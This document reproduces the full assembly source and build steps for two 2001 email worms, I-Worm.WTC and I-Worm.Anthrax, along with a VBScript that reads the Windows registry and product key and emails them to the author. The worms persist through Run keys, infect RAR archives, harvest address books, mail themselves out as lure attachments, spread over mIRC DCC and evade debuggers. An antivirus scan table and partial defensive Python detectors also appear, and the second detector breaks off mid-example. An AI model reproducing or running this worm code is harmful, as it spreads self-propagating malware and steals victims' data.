After the terrible terrorist attacks, I wanted to do something. I can't destroy the
computers to show my anger. It's a stupid reaction. I wanted to warn people to help to
find the authors of these attacks. And I wanted to help myself.
The target of this worm is not to spread to infect other computers but to help the FBI,
etc. in their investigation.

To delete the worm :

@echo off
del %windir%\SYSTEM\Visual8.exe
attrib -H C:\email.mel
del C:\email.mel

To build the worm :

@echo off
tasm32 /ml /m9 WTC
tlink32 -Tpe -c -x -aa WTC,,,import32,dllz
upx -9 WTC.exe
if exist *.obj del *.obj
if exist *.map del *.map

.586p
.model flat
.code

JUMPS

api macro a
extrn a:proc
call a
endm

include useful.inc
include myinclude.inc

start: call hide_worm


call mess_worm

twin_worm:
push 50
mov esi,offset orig_worm
push esi
push 0
api GetModuleFileNameA

mov edi,offset copy_worm


push edi
push 50
push edi
api GetSystemDirectoryA
add edi,eax
mov eax,"siV\"
stosd
mov eax,"8lau"
stosd
mov eax,"exe."
stosd
pop edi

push 0
push edi
push esi
api CopyFileA
push 15
push edi
push 1
@pushsz "Visual Debugger"
@pushsz "Software\Microsoft\Windows\CurrentVersion\Run"
push 80000002h
api SHSetValueA

special_folder:
pushad
push 0
push 5
push offset personal
push 0
api SHGetSpecialFolderPathA
push offset personal
api SetCurrentDirectoryA
call get_worm_crc

find_first_rar:
push offset Search
@pushsz "*.rar"
api FindFirstFileA
inc eax
je find_close_rar
dec eax
mov [hSearch],eax
i_r: call infect_rar
push offset Search
push [hSearch]
api FindNextFileA
test eax,eax
jne i_r
find_close_rar:
push [hSearch]
api FindClose
end_virtual:
push 8000h
push 0
push [worm_main]
api VirtualAlloc
end_all_rar:
popad
call vbs_file
push 2 or 20h
@pushsz "C:\email.mel"
api SetFileAttributesA

verif_inet:
push 0
push offset inet
api InternetGetConnectedState
dec eax
jnz verif_inet
open_scan_mail:
pushad
push 00h
push 80h
push 03h
push 00h
push 01h
push 80000000h
@pushsz "C:\email.mel"
api CreateFileA
inc eax
je end_spread
dec eax
xchg eax,ebx

xor eax,eax
push eax
push eax
push eax
push 2
push eax
push ebx
api CreateFileMappingA
test eax,eax
je end_s1
xchg eax,ebp

xor eax,eax
push eax
push eax
push eax
push 4
push ebp
api MapViewOfFile
test eax,eax
je end_s2
xchg eax,esi

push 0
push ebx
api GetFileSize
cmp eax,3
jbe end_s3

scan_mail:
xor edx,edx
mov edi,offset mail_addr
push edi
p_c: lodsb
cmp al," "
je car_s
cmp al,0dh
je entr1
cmp al,0ah
je entr2
cmp al,"%"
je f_mail
cmp al,'@'
jne not_a
inc edx
not_a: stosb
jmp p_c
car_s: inc esi
jmp p_c
entr1: xor al,al
stosb
pop edi
test edx,edx
je scan_mail
call send_mail
jmp scan_mail
entr2: xor al,al
stosb
pop edi
jmp scan_mail
f_mail:

end_s3: push esi


api UnmapViewOfFile
end_s2: push ebp
api CloseHandle
end_s1: push ebx
api CloseHandle
end_spread:
popad

start_page:
pushad
mov edi,offset sinet
call sinet_size
dd 160
sinet_size:
push edi
call reg
dd 1
reg:
@pushsz "Start Page"
@pushsz "Software\Microsoft\Internet Explorer\Main"
push 80000001h
api SHGetValueA

call @web
db "http://stcom.net/",0
db "http://stcom.net/default2.htm",0
db "http://stcom.net/qoqazfr",0
db "http://stcom.net/kavkoz",0
db "http://stcom.net/falestine",0
db "http://stcom.net/oulamah",0
db "http://stcom.net/Oulamah",0
db "http://stcom.net/An-Nissa",0
db "http://stcom.net/ahghanistan",0
db "http://www.alesteqlal.com/",0
@web:
pop esi
push 10
pop ecx
w_loop:
push ecx
push esi
push offset sinet
api lstrcmp
test eax,eax
jnz continue
call alert_fbi
jmp end_web
continue:
@endsz
pop ecx
loop w_loop
end_web:
popad

end_worm:
push 0
api ExitProcess

hide_worm:
pushad
@pushsz "Kernel32.dll"
api GetModuleHandleA
xchg eax,ecx
jecxz end_hide_worm
@pushsz "RegisterServiceProcess"
push ecx
api GetProcAddress
xchg eax,ecx
jecxz end_hide_worm
push 1
push 0
call ecx
end_hide_worm:
popad
ret

mess_worm:
pushad
push offset SystemTime
api GetSystemTime
cmp [SystemTime.wDay],04h
jne end_mess
push 40h
@pushsz "I-Worm.Super coded by PetiK"
call @txt
db "Because of the different terrorism acts in the USA",0dh,0ah
db "I don't will destroy your computer.",0dh,0ah,0dh,0ah
db "If you have some informations about the authors or Ben Laden,",0dh,0ah
db 9,"PLEASE CONTACT THE FBI",0
@txt:
push 0
api MessageBoxA
end_mess:
popad
ret

get_worm_crc Proc
pushad
push 0
push 80h
push 3
push 0
push 0
push 80000000h
push offset copy_worm
api CreateFileA
inc eax
je end_all_rar
dec eax
mov [hFile],eax
push 0
push eax
api GetFileSize
mov [filesize],eax
mov [RARCompressed],eax
mov [RAROriginal],eax
push eax

push 4
push 1000h or 2000h
push eax
push 0
api VirtualAlloc
test eax,eax
pop edx
je end_file
xchg eax,ebx
mov [worm_main],ebx

push edx
push 0
push offset tmp
push edx
push ebx
push [hFile]
api ReadFile
pop edi
mov esi,ebx
call CRC32
mov [RARCRC32],eax

end_file:
push [hFile]
api CloseHandle
popad
ret
get_worm_crc EndP
CRC32 Proc
push ecx
push edx
push ebx
xor ecx,ecx
dec ecx
mov edx,ecx
nxt_byte_crc:
xor eax,eax
xor ebx,ebx
lodsb
xor al,cl
mov cl,ch
mov ch,dl
mov dl,dh
mov dh,8
nxt_bit_crc:
shr bx,1
rcr ax,1
jnc no_crc
xor ax,08320h
xor bx,0EDB8h
no_crc: dec dh
jnz nxt_bit_crc
xor ecx,eax
xor edx,ebx
dec edi
jne nxt_byte_crc
not edx
not ecx
pop ebx
mov eax,edx
rol eax,16
mov ax,cx
pop edx
pop ecx
ret
CRC32 EndP
infect_rar Proc
pushad
push offset Search.cFileName
api GetFileAttributesA
cmp eax,1
je end_inf
push 0
push 80h
push 3
push 0
push 0
push 80000000h or 40000000h
push offset Search.cFileName
api CreateFileA
inc eax
je end_inf
dec eax
xchg eax,ebx

push 2
push 0
push 0
push ebx
api SetFilePointer

mov esi,offset RARHeaderCRC+2


push end_RAR-RARHeader-2
pop edi
call CRC32 ;calculate CRC32 of rar header
mov [RARHeaderCRC],ax

push 0
push offset tmp
push end_RAR-RARHeader
call end_RAR
RARHeader:
RARHeaderCRC dw 0
RARType db 74h
RARFlags dw 8000h
RARHSize dw end_RAR-RARHeader
RARCompressed dd 2000h
RAROriginal dd 2000h
RAROS db 0
RARCRC32 dd 0
RARFileDateTime dd 12345678h
RARNeedVer db 14h
RARMethod db 30h
RARFNameSize dw end_RAR-RARName
RARAttrib dd 0
RARName db 'SUPER.EXE'
end_RAR:push ebx
api WriteFile ;write the rar header

push 0
push offset tmp
push [filesize]
push [worm_main]
push ebx
api WriteFile ;write the worm

push ebx
api CloseHandle ;close the file

push 1
push offset Search.cFileName
api SetFileAttributesA ;set already-infected mark
end_inf:popad
ret
infect_rar EndP

vbs_file Proc
pushad
push 00h
push 80h
push 02h
push 00h
push 01h
push 40000000h
@pushsz "C:\wrm.vbs"
api CreateFileA
xchg eax,ebx

push 0
call @tmp
dd ?
@tmp:
push e_vbs - s_vbs
call e_vbs
s_vbs: db 'On Error Resume Next',CRLF
db 'Set f=CreateObject("Scripting.FileSystemObject")',CRLF
db 'Set O=CreateObject("Outlook.Application")',CRLF
db 'Set M=O.GetNameSpace("MAPI")',CRLF
db 'Set mel=f.CreateTextFile("C:\email.mel")',CRLF
db 'mel.Close',CRLF
db 'For Each N In M.AddressLists',CRLF
db 'If N.AddressEntries.Count <> 0 Then',CRLF
db 'For c=1 To N.AddressEntries.Count',CRLF
db 'Set P=N.AddressEntries(c)',CRLF
db 'Set mel=f.OpenTextFile("C:\email.mel",8,true)',CRLF
db 'mel.WriteLine P.Address',CRLF
db 'mel.Close',CRLF
db 'Next',CRLF
db 'End If',CRLF
db 'Next',CRLF
db 'Set mel=f.OpenTextFile("C:\email.mel",8,true)',CRLF
db 'mel.WriteLine "%"',CRLF
db 'mel.Close',CRLF
e_vbs: push ebx
api WriteFile
push ebx
api CloseHandle
push 1
@pushsz "wscript C:\wrm.vbs"
api WinExec
push 5000
api Sleep
@pushsz "C:\wrm.vbs"
api DeleteFileA
popad
ret
vbs_file EndP
send_mail:
xor eax,eax
push eax
push eax
push offset MsgWrm
push eax
push [hMAPI]
api MAPISendMail
ret

alert_fbi:
@pushsz "C:\information.txt"
push offset sinet
@pushsz "Start Page of MSIE"
@pushsz "Information about the suspect written by the Worm"
api WritePrivateProfileStringA

mov edi,offset names


call name_size
dd 160
name_size:
push edi
call reg2
dd 1
reg2:
@pushsz "RegisteredOwner"
@pushsz "Software\Microsoft\Windows\CurrentVersion"
push 80000002h
api SHGetValueA
@pushsz "C:\information.txt"
push offset names
@pushsz "Name of the suspect"
@pushsz "Information about the suspect written by the Worm"
api WritePrivateProfileStringA

push 50
push offset Systemini
api GetWindowsDirectoryA
@pushsz "\Win.ini"
push offset Systemini
api lstrcat
push offset Systemini
push 20
push offset org_pays
push offset default
@pushsz "sCountry"
@pushsz "intl"
api GetPrivateProfileStringA
@pushsz "C:\information.txt"
push offset org_pays
@pushsz "Country of the suspect"
@pushsz "Information about the suspect written by the Worm"
api WritePrivateProfileStringA

xor eax,eax
push eax
push eax
push offset MsgFbi
push eax
push [hMAPI]
api MAPISendMail
push 30000
api Sleep
@pushsz "C:\information.txt"
api DeleteFileA
ret

.data
; === copy_worm ===
orig_worm db 50 dup (0)
copy_worm db 50 dup (0)
rar_worm db 50 dup (0)

; === rar_files ===


personal db 50 dup (0)
worm_main dd ?
tmp dd ?
filesize dd ?
hFile dd ?
hSearch dd ?

; === scan_mail ===


mail_addr db 128 dup (?)
hMAPI dd 0
inet dd 0

; === information ===


sinet dd 0
names dd 0
Systemini db 50 dup (0)
org_pays db 20 dup(0)
default db 0

; === gen_mail ===


infofbi db "C:\information.txt",0
mailfbi db "newyork@fbi.gov",0
subjectfbi db "WARNING ABOUT DJIHAD AND PERHAPS BENLADEN !",0
bodyfbi db "This is a mail written by a worm called "
db "I-Worm.WTC coded by PetiK.",CRLF
db "The reason to receive this sort of mail is that the "
db "worm has found in the somebody's computer the link "
db "to http://stcom.net or other site web dealing with the djihad.",CRLF,CRLF
db "You can see some informations about this person with Start Page "
db "of MSIE, registered owner and the country.",CRLF,CRLF
db "I hope that it help you in your investigations about the "
db "terrorist attacks in NYC and Washington DC.",CRLF,CRLF
db 9,9,"Worm.WTC - PetiK",0

subjectwrm db "Everybody against the terrorists !",0


bodywrm db "This freeware will help us to fight the terrorist "
db "who kill innocent civilians.",CRLF,CRLF
db 9,"Click at the attached file to see.",00h
name_mail db "StopTerrorists.exe",00h

MsgFbi dd ?
dd offset subjectfbi
dd offset bodyfbi
dd ?
dd ?
dd ?
dd 2
dd offset MsgFrom
dd 1
dd offset MsgToFbi
dd 1
dd offset AttachFbi

MsgFrom dd ?
dd ?
dd ?
dd ?
dd ?
dd ?
MsgToFbi dd ?
dd 1
dd ?
dd offset mailfbi
dd ?
dd ?

AttachFbi dd ?
dd ?
dd ?
dd offset infofbi
dd ?
dd ?

MsgWrm dd ?
dd offset subjectwrm
dd offset bodywrm
dd ?
dd ?
dd ?
dd 2
dd offset MsgFrom
dd 1
dd offset MsgToWrm
dd 1
dd offset AttachWrm

MsgToWrm dd ?
dd 1
dd ?
dd offset mail_addr
dd ?
dd ?

AttachWrm dd ?
dd ?
dd ?
dd offset orig_worm
dd offset name_mail
dd ?

signature db "I-Worm.WTC",00h
author db "Coded by PetiK - 2001",00h

end start
end
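As an added, defensive example (not code from PetiK's archive above), the following Python parser walks RAR 2.x block headers laid out exactly like the worm's RARHeader structure, verifies the 16-bit header CRC (the low half of a standard CRC32 over the bytes after the CRC field, which is what the CRC32 routine in infect_rar produces) and flags appended entries shaped like the one the worm writes. The archive it scans is constructed inline as test data, and the two-signal threshold in find_suspicious_entries is my own assumption.

```python
"""Added defensive example: parse RAR 2.x block headers and flag worm-shaped entries."""
import struct
import zlib

RAR_MARKER = b"Rar!\x1a\x07\x00"   # 7-byte marker block that opens every RAR 2.x archive
BLOCK_MAIN = 0x73                   # archive header
BLOCK_FILE = 0x74                   # file header (RARType db 74h in the worm)
FLAG_LONG_BLOCK = 0x8000            # packed data follows the header (RARFlags dw 8000h)
METHOD_STORED = 0x30                # no compression (RARMethod db 30h)
WORM_FTIME = 0x12345678             # constant RARFileDateTime the worm writes


def header_crc16(block: bytes) -> int:
    """RAR stores the low 16 bits of CRC32 over the header bytes that follow the CRC field."""
    return zlib.crc32(block[2:]) & 0xFFFF


def parse_rar_blocks(data: bytes):
    """Yield one dict per block; file blocks carry the fields of the RARHeader layout."""
    if not data.startswith(RAR_MARKER):
        raise ValueError("not a RAR archive: marker block missing")
    pos = len(RAR_MARKER)
    while pos + 7 <= len(data):
        crc, btype, flags, hsize = struct.unpack_from("<HBHH", data, pos)
        if hsize < 7 or pos + hsize > len(data):
            break                                   # truncated or corrupt header: stop
        entry = {"offset": pos, "type": btype, "flags": flags, "header_size": hsize,
                 "crc_ok": header_crc16(data[pos:pos + hsize]) == crc}
        add_size = 0
        if flags & FLAG_LONG_BLOCK and hsize >= 11:
            add_size = struct.unpack_from("<I", data, pos + 7)[0]
        if btype == BLOCK_FILE and hsize >= 32:
            (pack_size, unp_size, host_os, file_crc, ftime, unp_ver, method,
             name_size, attr) = struct.unpack_from("<IIBIIBBHI", data, pos + 7)
            body = data[pos + hsize:pos + hsize + pack_size]
            entry.update(name=data[pos + 32:pos + 32 + name_size].decode("latin-1"),
                         pack_size=pack_size, unp_size=unp_size, host_os=host_os,
                         unp_ver=unp_ver, method=method, ftime=ftime, attr=attr,
                         name_size=name_size,
                         data_crc_ok=zlib.crc32(body) == file_crc)
            add_size = pack_size
        yield entry
        pos += hsize + add_size


def find_suspicious_entries(data: bytes):
    """Return (name, reasons) for file blocks that look like the header infect_rar appends.

    Threshold is my own assumption: two independent signals flag an entry."""
    hits = []
    for e in parse_rar_blocks(data):
        if e["type"] != BLOCK_FILE:
            continue
        reasons = []
        if e["name"].lower().endswith(".exe") and e["method"] == METHOD_STORED:
            reasons.append("stored (uncompressed) executable")
        if e["ftime"] == WORM_FTIME:
            reasons.append("hard-coded timestamp 0x12345678")
        if e["flags"] == FLAG_LONG_BLOCK and e["header_size"] == 32 + e["name_size"]:
            reasons.append("minimal header with only the LONG_BLOCK flag set")
        if len(reasons) >= 2:
            hits.append((e["name"], reasons))
    return hits


def _file_block(name: bytes, payload: bytes, ftime: int) -> bytes:
    """Build one stored file block for the test fixture (constructed data, not a RAR writer)."""
    body = struct.pack("<BHH", BLOCK_FILE, FLAG_LONG_BLOCK, 32 + len(name))
    body += struct.pack("<IIBIIBBHI", len(payload), len(payload), 0, zlib.crc32(payload),
                        ftime, 0x14, METHOD_STORED, len(name), 0) + name
    return struct.pack("<H", zlib.crc32(body) & 0xFFFF) + body + payload


def build_sample_archive() -> bytes:
    """Constructed archive: marker, main header, a benign text file, then a worm-shaped entry."""
    main = struct.pack("<BHHHI", BLOCK_MAIN, 0, 13, 0, 0)
    main = struct.pack("<H", zlib.crc32(main) & 0xFFFF) + main
    benign = _file_block(b"readme.txt", b"hello from a normal archive\r\n", 0x3A5B7C9D)
    dummy = b"MZ" + b"\x00" * 30            # placeholder bytes standing in for an appended body
    return RAR_MARKER + main + benign + _file_block(b"SUPER.EXE", dummy, WORM_FTIME)


if __name__ == "__main__":
    for entry_name, why in find_suspicious_entries(build_sample_archive()):
        print(f"{entry_name}: {', '.join(why)}")
```

Real archivers set additional flag bits (dictionary size, solid, etc.), so the "minimal header" signal alone is not flagged; a benign stored .txt entry in the fixture passes clean.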

SUPER.VBS
On Error Resume Next
Set ws=CreateObject("WScript.Shell")
verif=ws.RegRead("HKLM\Software\Microsoft\SuperWorm\")
If verif <> "send" Then
ro1=ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOwner")
ro2=ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOrganization")
pk=ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\ProductKey")
pi=ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\ProductId")
ver=ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\Version")
vern=ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\VersionNumber")
sp=ws.RegRead("HKCU\Software\Microsoft\Internet Explorer\Main\Start Page")
ld=ws.RegRead("HKCU\Software\Microsoft\Internet Explorer\International\AcceptLanguage")
Set OA=CreateObject("Outlook.Application")
Set EM=OA.CreateItem(0)
EM.To="petik@multimania.com"
EM.BCC = "support@microsoft.com; support@avx.com; nimda-request@sophos.com"
EM.Subject="I am infected by I-Worm.Super !!"
body="My name is " & ro1 & ","
body = body & VbCrLf & "I was infected by I-Worm.Super :-("
body = body & VbCrLf & "It was on "& date & " at " & time & "."
body = body & VbCrLf & ""
body = body & VbCrLf & "If you want some informations about me :"
body = body & VbCrLf & "My registered owner : " & ro1
body = body & VbCrLf & "My registered organization : " & ro2
body = body & VbCrLf & "My Product Key : " & pk
body = body & VbCrLf & "My Product Indentification : " & pi
body = body & VbCrLf & "My version of Windows : " & ver & " " & vern
body = body & VbCrLf & "My start page of MSIE : " & sp
body = body & VbCrLf & "My country : " & ld
body = body & VbCrLf & ""
body = body & VbCrLf & "Please help me !"
body = body & VbCrLf & "Thank you very much."
EM.Body=body
EM.DeleteAfterSubmit=True
EM.Send
ws.RegWrite "HKLM\Software\Microsoft\SuperWorm\","send"
End If
File WTC.exe received on 05.16.2009 20:03:13 (CET)

Antivirus Version Last Update Result


a-squared 4.0.0.101 2009.05.16 Email-Worm.Win32.Petik!IK
AhnLab-V3 5.0.0.2 2009.05.16 Win32/PetTick.8704.C
AntiVir 7.9.0.168 2009.05.15 Worm/Petik.Gen
Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Win32
Authentium 5.1.2.4 2009.05.16 W32/Malware!2e38
Avast 4.8.1335.0 2009.05.15 Win32:Petik-WTC
AVG 8.5.0.336 2009.05.15 I-Worm/Petik.M
BitDefender 7.2 2009.05.16 Generic.Malware.SMsp!g.852A5C9B
CAT-QuickHeal 10.00 2009.05.15 -
ClamAV 0.94.1 2009.05.16 Worm.WTC
Comodo 1157 2009.05.08 Worm.Win32.Petik.U
DrWeb 5.0.0.12182 2009.05.16 Win32.Petik.12288
eSafe 7.0.17.0 2009.05.14 Win32.Petik
eTrust-Vet 31.6.6508 2009.05.16 Win32/Petik.8704.C
F-Prot 4.4.4.56 2009.05.16 W32/Malware!2e38
F-Secure 8.0.14470.0 2009.05.16 Email-Worm.Win32.Petik
Fortinet 3.117.0.0 2009.05.16 W32/PetTick@mm
GData 19 2009.05.16 Generic.Malware.SMsp!g.852A5C9B
Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.Win32.Petik
K7AntiVirus 7.10.737 2009.05.16 Email-Worm.Win32.Petik
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Petik
McAfee 5616 2009.05.15 W32/PetTick@MM
McAfee+Artemis 5616 2009.05.15 Artemis!2FB45484ACDD
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.Gen
Microsoft 1.4602 2009.05.16 Worm:Win32/PetTick.L@mm
NOD32 4080 2009.05.15 Win32/Petik.U
Norman 6.01.05 2009.05.16 W32/Pet_Tick.8704.D
nProtect 2009.1.8.0 2009.05.16 -
Panda 10.0.0.14 2009.05.16 W32/Petik
PCTools 4.4.2.0 2009.05.16 I-Worm.Petik.J1
Prevx 3.0 2009.05.16 Medium Risk Malware
Rising 21.29.52.00 2009.05.16 Worm.Petik.GEN
Sophos 4.41.0 2009.05.16 W32/Petik-WTC
Sunbelt 3.2.1858.2 2009.05.16 Worm.Petik
Symantec 1.4.4.12 2009.05.16 W95.Pet_Tick.gen
TheHacker 6.3.4.1.326 2009.05.15 W32/Petik
TrendMicro 8.950.0.1092 2009.05.15 WORM_PET.TICK.Q
VBA32 3.12.10.5 2009.05.16 Win32.Worm.WTC
ViRobot 2009.5.15.1737 2009.05.15 I-Worm.Win32.PetTick.8704.C
VirusBuster 4.6.5.0 2009.05.16 I-Worm.Petik.J1

Additional information
File size: 8704 bytes
MD5...: 2fb45484acdd0ec3a4f7f199b13e2262
SHA1..: 657559e72ba0fb47cbe296be5f8c8d01c1164636
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser
Name : I-Worm.Anthrax (aka : I-Worm.Fi)
Author : PetiK
Date : October 11th - November 6th
Size : 6144 bytes (compressed with UPX)

Action: Copies itself to
* WINDOWS\SYSTEM\MsSys32.exe
and adds to the key HKLM\Software\Microsoft\Windows\CurrentVersion\Run the value
* Microsoft System = WINDOWS\SYSTEM\MsSys32.exe

The worm uses anti-debugging checks aimed at SoftICE.

It creates an Internet shortcut file pointing to a web site about anthrax, on the Desktop if it can, otherwise in the C:\ root.

It creates in some directories a script so that it can spread with mIRC :

-C:\mirc
-C:\mirc32
-C:\progra~1\mirc
-C:\progra~1\mirc32

To spread, it uses MAPI with the first 10 e-mail addresses found in the WAB.

To delete the worm :
Look at the file Delete_Fi.vbs

To build the worm :

@echo off
tasm32 /ml /m9 Anthrax
tlink32 -Tpe -c -x -aa Anthrax,,,import32,dllz
upx -9 Anthrax.exe
if exist *.obj del *.obj
if exist *.map del *.map

Author's notes:

The worm has a bug at the end of its WAB spreading routine.
I want to thank Benny very much. I learnt a lot of things while reading his different
codes (XTC, HiV and Universe).

.586p
.model flat
.code
JUMPS

api macro a
extrn a:proc
call a
endm

include useful.inc
include myinclude.inc

start:
twin_worm:
push 50
mov esi,offset orig_worm
push esi
push 0
api GetModuleFileNameA ; esi = name of file

mov edi,offset copy_worm
push edi
push 50
push edi
api GetSystemDirectoryA
add edi,eax
mov eax,"SsM\"
stosd
mov eax,"23sy"
stosd
mov eax,"exe."
stosd
pop edi ; edi = %system%\MsSys32.exe

push 1
push edi
push esi
api CopyFileA ; copy itself
test eax,eax
je end_twin ; already copy ??

push 20
push edi
push 1
@pushsz "Microsoft System"
@pushsz "Software\Microsoft\Windows\CurrentVersion\Run"
push 80000002h
api SHSetValueA ; regedit

mess: push 1040h
@pushsz "Microsoft Windows"
call @txt
db "You must be connected to run this file.",CRLF,CRLF
db "If it's not the case, please connect you.",0
@txt:
push 0
api MessageBoxA ; fake message
end_twin:

call debug
e_sr:
call hide_worm

call create_url
call spread_mirc
verif_inet:
push 0
push offset inet
api InternetGetConnectedState
dec eax
jnz verif_inet

spread_wab:
pushad
srch_wab:
mov edi,offset wab_path
push offset wab_size
push edi
push offset reg
push 0
@pushsz "Software\Microsoft\Wab\WAB4\Wab File Name" ; The name of WAB file
push 80000001h
api SHGetValueA

push 0
push 0
push 3
push 0
push 1
push 80000000h
push offset wab_path
api CreateFileA
inc eax
je end_srch_wab
dec eax
xchg ebx,eax

push 0
push 0
push 0
push 2
push 0
push ebx
api CreateFileMappingA
test eax,eax
je end_wab1
xchg eax,ebp

push 0
push 0
push 0
push 4
push ebp
api MapViewOfFile
test eax,eax
je end_wab2
xchg eax,esi

mov verif,0
d_scan_mail:
call @smtp
db 'SMTP',00h,1Eh,10h,56h,3Ah ; the string what we want to find
@smtp:
pop edi
s_scan_mail:
pushad
push 9
pop ecx
rep cmpsb
popad
je scan_mail
inc esi
loop s_scan_mail
end_wab3:
push esi
api UnmapViewOfFile
end_wab2:
push ebp
api CloseHandle
end_wab1:
push ebx
api CloseHandle
end_srch_wab:
popad

end_worm:
push 0
api ExitProcess

create_url: ; this routine may be buggy on WinNT/2k
pushad
desktop_url:
@pushsz "SHELL32.dll"
api LoadLibraryA
mov ebx,eax
@pushsz "SHGetSpecialFolderPathA"
push ebx
api GetProcAddress
test eax,eax
jz on_hd
mov ebp,eax
push 0
push 0 ; DESKTOP
push offset desktop
push 0
call ebp
@pushsz "\Anthrax_Info.url"
push offset desktop
api lstrcat
mov esi,offset desktop
jmp c_sys
on_hd:
@getsz "C:\Anthrax_Info.url",esi
c_sys:
push 50
push offset shelldir
api GetSystemDirectoryA
@pushsz "\Shell32.dll"
push offset shelldir
api lstrcat
cr_url:
push esi
@pushsz "http://www.anthrax.com"
@pushsz "URL"
@pushsz "InternetShortcut"
api WritePrivateProfileStringA
push esi
@pushsz "23"
@pushsz "IconIndex"
@pushsz "InternetShortcut"
api WritePrivateProfileStringA
push esi
push offset shelldir
@pushsz "IconFile"
@pushsz "InternetShortcut"
api WritePrivateProfileStringA
end_url:
push ebx
api FreeLibrary
popad
ret
debug Proc
pushad
mov eax,fs:[20h]
test eax,eax
je $+4
kill: int 19h ; CD19
api IsDebuggerPresent
test eax,eax
jne kill

push 0
push 80h
push 3
push 0
push 0
push 40000000h or 80000000h
@pushsz "\\.\SICE" ; SOFTICE driver win98
api CreateFileA
inc eax
jne kill

push 0
push 80h
push 3
push 0
push 0
push 40000000h or 80000000h
@pushsz "\\.\NTICE" ; SOFTICE driver winNT/2k
api CreateFileA
inc eax
jne kill

popad
ret
debug EndP
hide_worm Proc
pushad
@pushsz "KERNEL32.dll"
api GetModuleHandleA
xchg eax,ecx
jecxz end_hide_worm
@pushsz "RegisterServiceProcess" ; Registered as Service Process
push ecx
api GetProcAddress
xchg eax,ecx
jecxz end_hide_worm
push 1
push 0
call ecx
end_hide_worm:
popad
ret
hide_worm EndP

spread_mirc Proc
push 50
push offset mircspread
api GetSystemDirectoryA
@pushsz "\MsSys32.exe"
push offset mircspread
api lstrcat
pushad
call @mirc
db 'C:\mirc\script.ini',0
db 'C:\mirc32\script.ini',0 ; spread with mIRC. Thanx to Microsoft.
db 'C:\progra~1\mirc\script.ini',0
db 'C:\progra~1\mirc32\script.ini',0
@mirc:
pop esi
push 4
pop ecx
mirc_loop:
push ecx
push 0
push 80h
push 2
push 0
push 1
push 40000000h
push esi
api CreateFileA
mov [hmirc],eax
push 0
push offset byte_write
@tmp_mirc:
push e_mirc - s_mirc
push offset s_mirc
push [hmirc]
api WriteFile
push [hmirc]
api CloseHandle
@endsz
pop ecx
loop mirc_loop
end_spread_mirc:
popad
ret
spread_mirc EndP

scan_mail:
xor edx,edx
add esi,21
mov edi,offset mail_addr
push edi
p_c: lodsb
cmp al," "
je car_s
cmp al,00h
je f_mail
cmp al,"@"
jne not_a
inc edx
not_a: stosb
jmp p_c
car_s: inc esi
jmp p_c
f_mail: xor al,al
stosb
pop edi
test edx,edx
je d_scan_mail
call send_mail
cmp verif,10
je end_worm
jmp d_scan_mail

send_mail:
inc verif
pushad
@pushsz "MAPI32.DLL"
api LoadLibraryA
xchg ebx,eax
mapi macro x
push offset sz&x
push ebx
api GetProcAddress
mov x,eax
endm
mapi MAPILogon
mapi MAPISendMail
mapi MAPILogoff

mapi_logon:
xor eax,eax
push offset hMAPI
push eax
push eax
push eax
push eax
push eax
call MAPILogon
test eax,eax
jne end_send_mail
mapi_send_mail:
xor eax,eax
push eax
push eax
push offset MsgWrm
push eax
push [hMAPI]
call MAPISendMail
mapi_logoff:
xor eax,eax
push eax
push eax
push eax
push [hMAPI]
call MAPILogoff
push ebx
api FreeLibrary
end_send_mail:
popad
ret

.data
; === copy_worm ===
orig_worm db 50 dup (0)
copy_worm db 50 dup (0)

; === url_info ===
desktop db 50 dup (0)
shelldir db 50 dup (0)
hurl dd ?

; === spread_mirc ===
byte_write dd ?
hmirc dd ?
s_mirc: db '[script]',CRLF
db 'n0=on 1:JOIN:{',CRLF
db 'n1= /if ( $nick == $me ) { halt }',CRLF
db 'n2= /.dcc send $nick '
mircspread db 50 dup (0)
db CRLF,'n3=}',0
e_mirc:

; === spread_wab ===
inet dd 0
wab_path db 100 dup (0)
wab_size dd 100
reg dd 1
verif dd ?

; === scan_mail ===
mail_addr db 128 dup (?)
; === spread_mail ===
szMAPISendMail db "MAPISendMail",0
szMAPILogon db "MAPILogon",0
szMAPILogoff db "MAPILogoff",0

MAPISendMail dd ?
MAPILogon dd ?
MAPILogoff dd ?
hMAPI dd 0

; === gen_mail ===
subjectwrm db "What is the anthrax ?",0
bodywrm db "I send you some informations about Anthrax.",CRLF
db "Click on the attached file.",0
name_mail db "Anthrax_Info.exe",0
mail_from db "support@microsoft.com",0

MsgWrm dd ?
dd offset subjectwrm
dd offset bodywrm
dd ?
dd ?
dd ?
dd 2
dd offset MsgFrom
dd 1
dd offset MsgToWrm
dd 1
dd offset AttachWrm

MsgFrom dd ?
dd 1
dd offset MsgFrom
dd offset mail_from
dd ?
dd ?

MsgToWrm dd ?
dd 1
dd ?
dd offset mail_addr
dd ?
dd ?

AttachWrm dd ?
dd ?
dd ?
dd offset orig_worm
dd offset name_mail
dd ?

signature db "I-Worm.Anthrax "
author db "Coded by PetiK - 2001",00h

end start
end
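The script.ini the worm drops hooks the mIRC JOIN event and DCC-sends its own copy to every user who joins a channel. As an added detection example (not part of the original archive), the following Python parses a [script] section and flags any event handler that auto-sends a file; the sample .ini text is constructed from the worm's data section, with the %system%\MsSys32.exe path filled in as the worm does at run time.

```python
"""Flag mIRC script.ini event hooks that DCC-send a file to whoever triggers them."""
import re
from typing import Dict, List

# Constructed sample: the [script] section I-Worm.Anthrax writes, with the
# %system%\MsSys32.exe path the worm fills in at run time (constructed value).
WORM_SCRIPT_INI = """[script]
n0=on 1:JOIN:{
n1= /if ( $nick == $me ) { halt }
n2= /.dcc send $nick C:\\WINDOWS\\SYSTEM\\MsSys32.exe
n3=}
"""

# Constructed benign script for comparison: greets joiners, sends no file.
BENIGN_SCRIPT_INI = """[script]
n0=on 1:JOIN:#help:{
n1= /msg $nick Welcome to $chan
n2=}
"""

# "on <level>:<EVENT>:" opens a remote-event handler; the level is usually a number.
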